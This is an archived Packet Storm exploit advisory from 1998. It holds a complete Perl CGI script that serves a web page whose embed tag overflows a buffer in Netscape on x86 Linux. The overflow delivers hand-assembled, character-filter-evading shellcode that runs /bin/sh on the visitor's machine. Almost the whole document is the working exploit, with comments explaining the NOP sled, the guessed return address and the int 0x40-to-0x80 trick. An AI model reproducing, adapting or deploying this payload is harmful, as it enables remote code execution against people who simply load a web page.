nsover.txt

1999-08-17T00:00:00
ID PACKETSTORM:15251
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `  
[ http://www.rootshell.com/ ]  
  
From nothing@shout.net Wed Oct 21 18:00:09 1998  
Date: Wed, 21 Oct 1998 19:23:45 -0500  
From: Mr. Nothing <nothing@shout.net>  
To: submission@rootshell.com  
Subject: Netscape Buffer Overflow  
  
Here is a buffer overflow exploit for Netscape on x86 Linux. It can  
be activated remotely by the following CGI script.  
  
See http://www.shout.net/~nothing/buffer-overflow-1/index.html  
for more information.  
  
-----  
  
#!/usr/bin/perl  
#  
# buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19  
  
sub parse {  
join("", map { /^[0-9A-Fa-f]{2}$/ ? pack("c", hex($_)) : "" } @_);  
}  
  
# This is very tricky business. Netscape maps unprintable characters  
# (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine  
# code must be free of these characters. This makes it impossible  
# to call int 0x80, so I put int 0x40 there and wrote code to  
# shift those bytes left before it gets called. Also null characters  
# can't be used because of C string conventions.  
  
# the first paragraph of the following turns the int 0x40 in the second  
# paragraph into int 0x80. the second paragraph nullifies the SIGALRM  
# handler.  
  
my $pre = parse qw{  
31 c0 # xorl %eax,%eax  
66 b8 ff 0f # movw $0x1056,%ax  
01 c4 # addl %eax,%esp   
c0 24 24 01 # shlb $1,(%esp)  
29 c4 # subl %eax,%esp  
  
31 c0 b0 30  
31 db b3 0e  
31 c9 b1 01  
cd 40  
};  
  
my $code = $pre . parse qw{  
b0 55 # movb $0x55,%al (marker)  
eb 58 # (jump below)  
  
5e # popl %esi  
  
56 # pushl %esi  
5b # popl %ebx  
43 43 43 43 43 43  
43 43 43 43 43 # addl $0xb,%ebx  
  
21 33 # andl %esi,(%ebx)  
09 33 # orl %esi,(%ebx)  
  
31 c0 # xorl %eax,%eax  
66 b8 56 10 # movw $0x1056,%ax  
01 c4 # addl %eax,%esp   
c0 24 24 01 # shlb $1,(%esp)  
33 c0 # xorl %eax,%eax  
b0 05 # movb $5,%al  
01 c4 # addl %eax,%esp   
c0 24 24 01 # shlb $1,(%esp)  
29 c4 # subl %eax,%esp  
66 b8 56 10 # movw $0x1056,%ax  
29 c4 # subl %eax,%esp  
  
  
31 d2 # xorl %edx,%edx  
21 56 07 # andl %edx,0x7(%esi)  
21 56 0f # andl %edx,0xf(%esi)  
b8 1b 56 34 12 # movl $0x1234561b,%eax  
35 10 56 34 12 # xorl $0x12345610,%eax   
  
21 d9 # andl %ebx,%ecx  
09 d9 # orl %ebx,%ecx  
  
4b 4b 4b 4b 4b 4b  
4b 4b 4b 4b 4b # subl $0xb,%ebx  
  
cd 40 # int $0x80  
31 c0 # xorl %eax,%eax  
40 # incl %eax  
cd 40 # int $0x80  
  
  
e8 a3 ff ff ff # (call above)  
};  
  
$code .= "/bin/sh";  
  
my $transmission = parse qw{  
6f 63 65 61 6e 20 64 65 73 65 72 74 20 69 72 6f 6e # inguz  
20 66 65 72 74 69 6c 69 7a 61 74 69 6f 6e 20 70 68 # inguz  
79 74 6f 70 6c 61 6e 6b 74 6f 6e 20 62 6c 6f 6f 6d # inguz  
20 67 61 74 65 73 20 73 6f 76 65 72 65 69 67 6e 74 # inguz  
79  
};  
  
my $nop = "\x90"; # this actually gets mapped onto 0x3f, but it doesn't seem  
# to matter  
  
my $address = "\x10\xdb\xff\xbf"; # wild guess, intended to be somewhere  
# in the chunk of nops. works on every  
# linux box i've tried it on so far.  
  
  
my $len = 0x1000 - length($pre);  
my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code;  
# the first $address is in the string replaces another  
# pointer in the same function which gets dereferenced  
# after the buffer is overflowed. there must be a valid  
# address there or it will segfault early.  
  
print <<EOF;  
Content-type: text/html  
  
<!-- $transmission -->  
<embed type="$exploit" src="data:x">  
EOF  
`